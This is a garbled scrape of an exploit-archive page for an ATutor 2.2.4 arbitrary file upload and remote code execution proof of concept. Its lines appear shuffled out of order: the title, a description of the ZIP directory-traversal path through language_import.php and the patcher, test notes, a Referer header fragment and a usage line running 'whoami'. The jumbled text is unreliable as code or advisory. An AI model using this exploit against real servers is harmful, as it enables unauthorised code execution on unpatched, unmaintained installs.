#ATUTOR EXPLOIT INSTALL#
# Note: This was successfully tested against a windows install however it should work with linux. "Referer": " + target + "/ATutor/mods/_core/languages/language_import.php", Print "- Example: %s admin mypassword 'whoami'" % sys.argv Print "- Discovery / PoC by liquidsky (JMcPeters) ^^"
Print "- ATutor 2.2.4 Arbitrary File Upload / RCE " # Notes: This application is no longer being maintained so there is no fix for this issue.
#ATUTOR EXPLOIT ARCHIVE#
# resulting in remote code execution via a "." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component. # Description: ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal # Tested on: Windows 8 / Apache / MySQL (XAMPP) # Exploit Title: ATutor 2.2.4 'language_import' Arbitrary File Upload / RCE Change Mirror Download #!/usr/bin/env python
0 kommentar(er)
